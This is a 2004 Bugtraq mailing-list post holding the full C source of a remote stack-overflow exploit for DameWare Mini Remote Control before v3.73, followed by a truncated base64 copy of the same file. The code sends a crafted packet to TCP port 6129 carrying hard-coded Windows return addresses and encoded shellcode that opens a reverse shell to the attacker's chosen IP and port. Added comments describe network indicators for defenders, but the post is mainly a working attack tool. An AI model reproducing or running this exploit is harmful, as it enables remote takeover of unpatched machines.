[33054] in bugtraq
DameWare Mini Remote Control < v3.73 remote exploit by kralor]
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Iv=E1n_Rodriguez_Al)
Mon Jan 12 12:46:34 2004
Message-ID: <2493.81.53.157.122.1073759518.squirrel@webmail.familleboily.net>
Date: Sat, 10 Jan 2004 19:31:58 +0100 (CET)
From: =?iso-8859-1?Q?Iv=E1n_Rodriguez_Almui=F1a?= <kralor@coromputer.net>
To: bugtraq@securityfocus.com
Reply-To: kralor@coromputer.net
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="----=_20040110193158_35264"
------=_20040110193158_35264
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
/**************************************************************************************/
/* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by
kralor [Crpt] */
/* - - - - - - - - - - - - - - - - - -
- - - */
/* 8/10 win2k successfully exploited in blind mode (lang & type
[pro,srv,etc] unknown)*/
/* tested against dameware versions: v3.68 v3.72
*/
/* In comments there's some information about offsets for jmp esp on diff
OS. */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll,
on winXP it */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode
format) */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called,
but it is in */
/* the shellcode.Some people reported me 3 different offsets for winXP
pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I
can't find */
/* another better EIP for XP (hope this 3 offsets will be enough for XP).
*/
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP
values. */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet
#coromputer */
/**************************************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment (lib,"ws2_32")
/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4
*/
/*
 * Hard-coded 4-byte return addresses, written as little-endian byte strings.
 * start_auth() prints the three XP values as 0x7736d507, 0x77351cc1 and
 * 0x77391cc1; the comment block above documents the Windows 2000 value as a
 * "jmp esp" in comctl32.dll for the builds it lists.  Being absolute
 * addresses, they are presumably valid only for those exact OS builds.
 */
#define RET_XP_VAR0 "\x07\xD5\x36\x77"
/* NOTE(review): the trailing comment below is wrapped onto its own line in this listing. */
#define RET_XP_VAR1 "\xC1\x1C\x35\x77" // these offsets has been reported
by many people
#define RET_XP_VAR2 "\xC1\x1C\x39\x77"
#define RET_WIN2k "\xB8\x64\x75\x71"
/* TCP port that cnx() connects to on the remote host. */
#define PORT 6129
/* Size of the packet buffer in start_auth(), and the length of the packet it sends. */
#define SIZEOF 4096
/*
 * Client identity fields that start_auth() copies verbatim into the packet.
 * Defender note: an unmodified build of this tool sends these literal
 * strings, so they can serve as a low-confidence indicator in captures of
 * traffic to PORT; any edited copy will not match them.
 */
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
/* Version string the client reports; 3.72 is one of the versions the header says was tested. */
#define CLIENT_VERSION "3.72.0.0"
/*
 * cnx - open a TCP connection to `host` on the fixed PORT.
 *
 * host: host name or dotted-quad address of the remote machine.
 * Returns the connected socket, or 0 on failure (main() tests for 0).
 *
 * Defender note: the destination is always TCP PORT (6129), so filtering
 * that port from untrusted networks removes the path this tool relies on.
 */
int cnx(char *host)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;
sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
/* First guess: treat host as a dotted-quad literal; overwritten below if the name resolves. */
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons(PORT);
if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
/* Resolution failed: fall back to the literal form and give up if that is not an address either. */
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
/* Every connect() failure is reported with the same "connection refused" text. */
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}
/*
 * set_sc - patch the caller's payload buffer in place before it is sent.
 *
 * os:        1 when start_auth() classified the peer as XP, 0 for Windows 2000.
 * rhost:     dotted-quad address, converted with inet_addr().
 * rport:     port number, converted with htons().
 * shellc0de: payload buffer to modify; written at fixed offsets up to 453.
 *
 * The address and port bytes are XORed with 0x95 before being stored, the
 * same constant that appears in the payload's opening bytes.
 *
 * Defender note: rhost/rport are the "<your_ip> <your_port>" arguments from
 * syntax(), and start_auth() reports that the shell should arrive there, so
 * the payload is expected to make an outbound connection from the target.
 * Egress filtering on hosts running the service limits that step.
 */
void set_sc(int os, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
char *port_to_shell="",*ip1="";
/* Four address bytes, in the order inet_addr() returns them, go to offsets 325..328. */
ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;
/* Two port bytes in network order go to offsets 319..320. */
port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;
/*
 * XP only: four bytes are overwritten with 0xfe.  Presumably this is the
 * kernel32.dll / KERNEL32.DLL case adjustment described in the file
 * header; that cannot be confirmed from this function alone.
 */
if(os==1) {
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
}
return;
}
/*
 * start_auth - run the service's opening exchange on `sock`, then send one
 * crafted SIZEOF-byte client-information packet.
 *
 * sock:  connected socket returned by cnx().
 * rhost: address passed on to set_sc() and printed in the final message.
 * rport: port passed on to set_sc() and printed in the final message.
 * var:   0, 1 or 2; picks RET_XP_VAR0/1/2 when the peer is classified as XP,
 *        and is not consulted for Windows 2000.
 *
 * Returns 0 when the last reply starts with 0x32 0x11, and -1 as soon as one
 * of the three replies does not start with the two bytes expected for it.
 *
 * Defender notes:
 *  - The packet carries a user name and client profile strings but no
 *    password or other credential, so as far as this code shows the exchange
 *    needs no valid account.
 *  - The reply headers checked here (0x30 0x11, 0x10 0x27, 0x32 0x11), a
 *    full 4096-byte client packet and a run of 0x90 bytes starting at offset
 *    416 are fixed properties of this tool's traffic to TCP 6129.
 *  - The post title scopes the issue to versions before v3.73.
 */
int start_auth(int sock, char *rhost, int rport, int var)
{
/* i is initialised but never used in this function. */
int size,i=4,os;
char buffer[SIZEOF];
/* Opaque machine-code payload; set_sc() edits a few bytes of it below. */
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";
/* Exchange 1: the first message from the peer must start 0x30 0x11. */
size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
/* The same message is sent back with bytes 28 and 36 changed. */
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
/*
 * Exchange 2: keep reading until 4096 bytes have been counted.  Each recv()
 * is offered SIZEOF bytes at &buffer[size] and its return value is added to
 * size without being checked.
 */
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));
if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Operating system : ");
/*
 * Either byte matching classifies the peer as XP; anything else is reported
 * as Win2000.  This reply is read before the client has sent any user name,
 * so the OS and service-pack fields are available to any peer that
 * completes the first exchange.
 */
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
/* The service-pack text at offset 37 is printed exactly as the peer supplied it. */
printf("\r\n[i] Service Pack : %s\r\n",!buffer[37]?"0":&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,rhost,rport,shellc0de);
/* Reuse the buffer for the outgoing packet: the 0x10 0x27 header bytes stay, the rest is cleared. */
memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
/* 180 bytes of 0x90 fill offsets 416..595; the next writes replace part of that run. */
memset(&buffer[416],0x90,180);
printf("Done\r\n");
/*
 * Offset 516 receives the 4-byte return address for the detected OS.  This
 * matches the stack overflow ("b0f") the file header describes; the
 * server-side field being overrun is not visible in this file.
 */
if(os==0)
memcpy(&buffer[516],RET_WIN2k,4);
else {
if(var==0) {
printf("[!] Using 0x7736d507 as ret addr\r\n");
memcpy(&buffer[516],RET_XP_VAR0,4);
} else {
if(var==1) {
memcpy(&buffer[516],RET_XP_VAR1,4);
printf("[!] Using 0x77351cc1 as ret addr\r\n");
} else {
memcpy(&buffer[516],RET_XP_VAR2,4);
printf("[!] Using 0x77391cc1 as ret addr\r\n");
}
}
}
/* The payload follows immediately at 520; sizeof includes its terminating NUL. */
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
/* Remaining client profile fields, each at a fixed offset within the packet. */
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("[+] Sending evil %-30s ...","packet");
/* The whole SIZEOF-byte buffer is sent, including the zero padding. */
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);
/*
 * NOTE(review): any reply that does not start 0x32 0x11, including an empty
 * buffer after a failed recv(), is printed as "Patched", so that message
 * is not proof that a host runs a fixed version.
 */
if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
/* Reached on a matching reply header alone; nothing here confirms the payload ran. */
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}
/*
 * banner - print the two-line tool banner to stdout.
 *
 * NOTE(review): the first string literal is split across two lines in this
 * listing, which looks like mail line-wrapping rather than the author's layout.
 */
void banner(void)
{
printf("\r\n [Crpt] DameWare Mini Remote Control < v3.73 remote exploit
by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
/*
 * syntax - print the command-line usage text to stdout.
 *
 * prog: program name shown in the usage line (main() passes argv[0]).
 *
 * The optional fourth argument selects one of three hard-coded XP return
 * addresses.  NOTE(review): the three variant lines are split mid-literal in
 * this listing, which looks like mail line-wrapping.
 */
void syntax(char *prog)
{
printf("syntax: %s <host> <your_ip> <your_port> [winXP variant]\r\n",prog);
printf("winXP variante:\r\n");
printf(" will use 0x7736d507 as eip [found on many
XPs][default]\r\n");
printf(" 1 will use 0x77351cc1 as eip [found on many
XPs]\r\n");
printf(" 2 will use 0x77391cc1 as eip [found on one XP
sp0]\r\n");
return;
}
/*
 * main - parse the command line, start Winsock, connect and run start_auth().
 *
 * argv[1]: remote host; argv[2] and argv[3]: address and port handed to
 * start_auth(); argv[4] (optional): XP variant 0..2, default 0.
 *
 * Returns -1 for a usage error, a Winsock start-up failure or a failed
 * connection, and 0 otherwise.
 */
int main(int argc, char *argv[])
{
WSADATA wsaData;
int sock,var=0;
banner();
if(argc<4||argc>5) {
syntax(argv[0]);
return -1;
}
if(argc==5) {
/* atoi() yields 0 for non-numeric text, which then selects variant 0. */
var=atoi(argv[4]);
if(var>2||var<0) {
syntax(argv[0]);
return -1;
}
}
/* 0x0101 requests Winsock version 1.1. */
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1]);
if(!sock)
return -1;
/* The result of start_auth() is discarded, so the exit status is 0 once a connection was made. */
start_auth(sock,argv[2],atoi(argv[3]),var);
return 0;
}
------=_20040110193158_35264
Content-Type: application/octet-stream; name="DameWeird.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="DameWeird.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqLw0KLyogICAgIFtDcnB0XSBEYW1lV2FyZSBN
aW5pIFJlbW90ZSBDb250cm9sIDwgdjMuNzMgcmVtb3RlIGV4cGxvaXQgYnkga3JhbG9yIFtDcnB0
XSAgICAqLw0KLyogLSAgIC0gICAtICAgLSAgIC0gICAtICAgLSAgIC0gICAtICAgLSAgIC0gICAt
ICAgLSAgIC0gICAtICAgLSAgIC0gICAtICAgLSAgIC0gICAtICAqLw0KLyogOC8xMCB3aW4yayBz
dWNjZXNzZnVsbHkgZXhwbG9pdGVkIGluIGJsaW5kIG1vZGUgKGxhbmcgJiB0eXBlIFtwcm8sc3J2
LGV0Y10gdW5rbm93bikqLw0KLyogdGVzdGVkIGFnYWluc3QgZGFtZXdhcmUgdmVyc2lvbnM6IHYz
LjY4ICB2My43MiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLw0KLyogSW4g
Y29tbWVudHMgdGhlcmUncyBzb21lIGluZm9ybWF0aW9uIGFib3V0IG9mZnNldHMgZm9yIGptcCBl
c3Agb24gZGlmZiBPUy4gICAgICAgICAqLw0KLyogSSd2ZSBmaXhlZCBhIHByb2JsZW0gaW4gdGhl
IHNoZWxsYzBkZSwgd2hlbiBJIGNoZWNrIGZvciBrZXJuZWwzMi5kbGwsIG9uIHdpblhQIGl0ICAq
Lw0KLyogaXMga2VybmVsMzIuZGxsLCBidXQgb24gd2luMmsgaXQgaXMgS0VSTkVMMzIuRExMIChi
b3RoIGluIHVuaWNvZGUgZm9ybWF0KSAgICAgICAgICAqLw0KLyogc2hlbGxjMGRlIGlzIGEgYml0
IGxvbmcgZm9yIHRoaXMgYjBmLCBzbyBFeGl0VGhyZWFkIHdvbid0IGJlIGNhbGxlZCwgYnV0IGl0
IGlzIGluICAqLw0KLyogdGhlIHNoZWxsY29kZS5Tb21lIHBlb3BsZSByZXBvcnRlZCBtZSAzIGRp
ZmZlcmVudCBvZmZzZXRzIGZvciB3aW5YUCBwcm8sIGhvbWUsIHNwMCAqLw0KLyogb3Igc3AxLCBz
byBJIGRvbid0IGtub3cgd2h5IGl0J3MgZGlmZmVyZW50IGFuZCBJIGhhdmVuJ3QgWFAgYXQgaG9t
ZSBJIGNhbid0IGZpbmQgICAqLw0KLyogYW5vdGhlciBiZXR0ZXIgRUlQIGZvciBYUCAoaG9wZSB0
aGlzIDMgb2Zmc2V0cyB3aWxsIGJlIGVub3VnaCBmb3IgWFApLiAgICAgICAgICAgICAqLw0KLyog
Z3JlZXR6OiBNck5pY2UsQW5BYyxUcmlwYVggJiBEZWNyeXB0dXMgZm9yIGhlbHBpbmcgbWUgdG8g
ZmluZCB0aGUgRUlQIHZhbHVlcy4gICAgICAqLw0KLyouLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u
Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u
Li4qLw0KLyogaW5mb3JtYXRpb25zOiBrcmFsb3JbYXRdY29yb21wdXRlci5uZXQsd3d3LmNvcm9t
cHV0ZXIubmV0LGlyYyB1bmRlcm5ldCAjY29yb21wdXRlciAqLw0KLyoqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqLw0KDQojaW5jbHVkZSA8d2luc29jay5oPg0KI2luY2x1ZGUgPHdpbmRvd3Mu
aD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KDQojcHJhZ21hIGNv
bW1lbnQgKGxpYiwid3MyXzMyIikNCg0KLyoNCjB4NzE3NTY0QjggICBqbXAgZXNwIGluIGNvbWN0
bDMyLmRsbA0Kd2luMmsgZnIgYWR2IHNydiBzcDINCndpbjJrIGVuIGFkdiBzcnYgc3AzDQp3aW4y
ayBlbiBhZHYgc3J2IHNwNA0Kd2luMmsgZW4gc3J2ICAgICBzcDMNCndpbjJrIGZyIHBybyAgICAg
c3AzDQp3aW4yayBlbiBwcm8gICAgIHNwNA0KKi8NCg0KI2RlZmluZSBSRVRfWFBfVkFSMCAiXHgw
N1x4RDVceDM2XHg3NyINCiNkZWZpbmUgUkVUX1hQX1ZBUjEgIlx4QzFceDFDXHgzNVx4NzciIC8v
IHRoZXNlIG9mZnNldHMgaGFzIGJlZW4gcmVwb3J0ZWQgYnkgbWFueSBwZW9wbGUNCiNkZWZpbmUg
UkVUX1hQX1ZBUjIgIlx4QzFceDFDXHgzOVx4NzciDQojZGVmaW5lIFJFVF9XSU4yayAgICJceEI4
XHg2NFx4NzVceDcxIg0KDQojZGVmaW5lIFBPUlQgNjEyOQ0KI2RlZmluZSBTSVpFT0YgNDA5Ng0K
I2RlZmluZSBXSU5VU0VSICJoNHgwciINCiNkZWZpbmUgV0lOSE9TVCAibDMzdF9ob21lIg0KI2Rl
ZmluZSBVU0VSUFJPRklMRV9OQU1FICJzY3JpcHQga2lkZGllIg0KI2RlZmluZSBVU0VSUFJPRklM
RV9DT01QQU5ZICJnMzNrIHNvbHV0aW9ucy4iDQojZGVmaW5lIFVTRVJQUk9GSUxFX0xJQ0VOU0Ug
IjExMTExLU9FTS0wMDAxMTExLTExMTExIg0KI2RlZmluZSBVU0VSUFJPRklMRV9EQVRFICIxMi8y
NC8wMyAwMDowMDowMCINCiNkZWZpbmUgSU5URVJGQUNFX0lQICIxOTIuMTY4LjEuMSwxOTIuMTY4
LjEuMiINCiNkZWZpbmUgV0lORE9NQUlOICJsMzN0X2QwbTQxbiINCiNkZWZpbmUgQ0xJRU5UX1ZF
UlNJT04gIjMuNzIuMC4wIg0KDQppbnQgY254KGNoYXIgKmhvc3QpDQp7DQoJaW50IHNvY2s7DQoJ
c3RydWN0IHNvY2thZGRyX2luIHllYWg7DQoJc3RydWN0IGhvc3RlbnQgKnNoZTsNCg0KCXNvY2s9
c29ja2V0KEFGX0lORVQsU09DS19TVFJFQU0sMCk7DQoJaWYoIXNvY2spIHsNCgkJcHJpbnRmKCJl
cnJvcjogdW5hYmxlIHRvIGNyZWF0ZSBzb2NrZXRcclxuIik7DQoJCXJldHVybiAwOw0KCQl9DQoJ
eWVhaC5zaW5fZmFtaWx5PUFGX0lORVQ7IA0KCXllYWguc2luX2FkZHIuc19hZGRyPWluZXRfYWRk
cihob3N0KTsgDQoJeWVhaC5zaW5fcG9ydD1odG9ucyhQT1JUKTsNCg0KaWYoKHNoZT1nZXRob3N0
YnluYW1lKGhvc3QpKSE9TlVMTCkgeyANCgltZW1jcHkoKGNoYXIgKikmeWVhaC5zaW5fYWRkcixz
aGUtPmhfYWRkcixzaGUtPmhfbGVuZ3RoKTsgDQoJfSBlbHNlIHsgDQoJaWYoKHllYWguc2luX2Fk
ZHIuc19hZGRyPWluZXRfYWRkcihob3N0KSk9PUlOQUREUl9OT05FKSB7DQoJCXByaW50ZigiZXJy
b3I6IGNhbm5vdCByZXNvbHZlIGhvc3RcclxuIik7DQoJCXJldHVybiAwOw0KCQl9IA0KCX0NCglw
cmludGYoIlsrXSBDb25uZWN0aW5nIHRvICUtMzBzIC4uLiIsaG9zdCk7DQoJaWYoY29ubmVjdChz
b2NrLChzdHJ1Y3Qgc29ja2FkZHIqKSZ5ZWFoLHNpemVvZih5ZWFoKSkhPTApIHsNCgkJcHJpbnRm
KCJlcnJvcjogY29ubmVjdGlvbiByZWZ1c2VkXHJcbiIpOw0KCQlyZXR1cm4gMDsNCgkJfQ0KCXBy
aW50ZigiRG9uZVxyXG4iKTsNCglyZXR1cm4gc29jazsNCn0NCg0Kdm9pZCBzZXRfc2MoaW50IG9z
LCBjaGFyICpyaG9zdCwgaW50IHJwb3J0LCBjaGFyICpzaGVsbGMwZGUpDQp7DQoJdW5zaWduZWQg
aW50IGlwPTA7DQoJdW5zaWduZWQgc2hvcnQgcG9ydD0wOw0KCWNoYXIgKnBvcnRfdG9fc2hlbGw9
IiIsKmlwMT0iIjsNCg0KCWlwID0gaW5ldF9hZGRyKHJob3N0KTsgaXAxID0gKGNoYXIqKSZpcDsN
CglzaGVsbGMwZGVbMzI1XT1pcDFbMF1eMHg5NTtzaGVsbGMwZGVbMzI2XT1pcDFbMV1eMHg5NTsN
CglzaGVsbGMwZGVbMzI3XT1pcDFbMl1eMHg5NTsgc2hlbGxjMGRlWzMyOF09aXAxWzNdXjB4OTU7
DQoNCglwb3J0ID0gaHRvbnMocnBvcnQpOw0KCXBvcnRfdG9fc2hlbGwgPSAoY2hhciAqKSAmcG9y
dDsNCglzaGVsbGMwZGVbMzE5XT1wb3J0X3RvX3NoZWxsWzBdXjB4OTU7DQoJc2hlbGxjMGRlWzMy
MF09cG9ydF90b19zaGVsbFsxXV4weDk1Ow0KDQoJaWYob3M9PTEpIHsNCgkJc2hlbGxjMGRlWzE2
N109c2hlbGxjMGRlWzIxNV09KHVuc2lnbmVkIGNoYXIpMHhmZTsNCgkJc2hlbGxjMGRlWzM0NV09
c2hlbGxjMGRlWzQ1M109KHVuc2lnbmVkIGNoYXIpMHhmZTsNCgkJfQ0KCXJldHVybjsNCn0NCg0K
aW50IHN0YXJ0X2F1dGgoaW50IHNvY2ssIGNoYXIgKnJob3N0LCBpbnQgcnBvcnQsIGludCB2YXIp
DQp7DQoJaW50IHNpemUsaT00LG9zOw0KCWNoYXIgYnVmZmVyW1NJWkVPRl07DQoJY2hhciBzaGVs
bGMwZGVbXSA9DQogICAgICAgICJceGViXHgwMlx4ZWJceDBmXHg2Nlx4ODFceGVjXHgwNFx4MDhc
eDhiXHhlY1x4ODNceGVjXHg1MFx4ZThceGVmIg0KICAgICAgICAiXHhmZlx4ZmZceGZmXHg1Ylx4
ODBceGMzXHgxMFx4MzNceGM5XHg2Nlx4YjlceGJhXHgwMVx4ODBceDMzXHg5NSINCiAgICAgICAg
Ilx4NDNceGUyXHhmYVx4N2VceGZhXHhhNlx4NGVceDI2XHhhNVx4ZjFceDFlXHg5Nlx4MWVceGQ1
XHg5OVx4MWUiDQogICAgICAgICJceGRkXHg5OVx4MWVceDU0XHgxZVx4YzlceGIxXHg5ZFx4MWVc
eGU1XHhhNVx4OTZceGUxXHhiMVx4OTFceGFkIg0KICAgICAgICAiXHg4Ylx4ZTBceGRkXHgxZVx4
ZDVceDhkXHgxZVx4Y2RceGE5XHg5Nlx4NGRceDFlXHhjZVx4ZWRceDk2XHg0ZCINCiAgICAgICAg
Ilx4MWVceGU2XHg4OVx4OTZceDY1XHhjM1x4MWVceGU2XHhiMVx4OTZceDY1XHhjM1x4MWVceGM2
XHhiNVx4OTYiDQogICAgICAgICJceDQ1XHgxZVx4Y2VceDhkXHhkZVx4MWVceGExXHgwZlx4OTZc
eDY1XHg5Nlx4ZTFceGIxXHg4MVx4MWVceGEzIg0KICAgICAgICAiXHhhZVx4ZTFceGIxXHg4ZFx4
ZTFceDkzXHhkZVx4YjZceDRlXHhlMFx4N2ZceDU2XHhjYVx4YTZceDVjXHhmMyINCiAgICAgICAg
Ilx4MWVceDk5XHhjYVx4Y2FceDFlXHhhOVx4MWFceDE4XHg5MVx4OTJceDU2XHgxZVx4OGRceDFl
XHg1Nlx4YWUiDQogICAgICAgICJceDU0XHhlMFx4MzRceDU2XHgxNlx4NzlceGQ1XHgxZVx4Nzlc
eDE0XHg3OVx4YjVceDk3XHg5NVx4OTVceGZkIg0KICAgICAgICAiXHhlY1x4ZDBceGVkXHhkNFx4
ZmZceDlmXHhmZlx4ZGVceGZmXHg5NVx4N2RceGUzXHg2YVx4NmFceDZhXHhhNiINCiAgICAgICAg
Ilx4NWNceDUyXHhkMFx4NjlceGUyXHhlNlx4YTdceGNhXHhmM1x4NTJceGQwXHg5NVx4YTZceGE3
XHgxZFx4ZDgiDQogICAgICAgICJceDk3XHgxZVx4NDhceGYzXHgxNlx4N2VceDkxXHhjNFx4YzRc
eGM2XHg2YVx4NDVceDFjXHhkMFx4OTFceGZkIg0KICAgICAgICAiXHhlN1x4ZjBceGU2XHhlNlx4
ZmZceDlmXHhmZlx4ZGVceGZmXHg5NVx4N2RceGQzXHg2YVx4NmFceDZhXHgxZSINCiAgICAgICAg
Ilx4YzhceDkxXHgxY1x4YzhceDEyXHgxY1x4ZDBceDAyXHg1Mlx4ZDBceDY5XHhjMlx4YzZceGQ0
XHhjNlx4NTIiDQogICAgICAgICJceGQwXHg5NVx4ZmFceGY2XHhmZVx4ZjBceDUyXHhkMFx4OTFc
eGUxXHhkNFx4OTVceDk1XHgxZVx4NThceGYzIg0KICAgICAgICAiXHgxNlx4N2NceDkxXHhjNFx4
YzZceDZhXHg0NVx4YTZceDRlXHhjNlx4YzZceGM2XHhjNlx4ZmZceDk0XHhmZiINCiAgICAgICAg
Ilx4OTdceDZhXHg0NVx4MWNceGQwXHgzMVx4NTJceGQwXHg2OVx4ZjZceGZhXHhmYlx4ZmJceDUy
XHhkMFx4OTUiDQogICAgICAgICJceGYwXHhmNlx4ZTFceDk1XHgxZVx4NThceGYzXHgxNlx4N2Nc
eDkxXHhjNFx4NmFceGUwXHgxMlx4NmFceGMwIg0KICAgICAgICAiXHgwMlx4YTZceDRlXHgyNlx4
OTdceDFlXHg0MFx4ZjNceDFjXHg4Zlx4OTZceDQ2XHhmM1x4NTJceDk3XHg5NyINCiAgICAgICAg
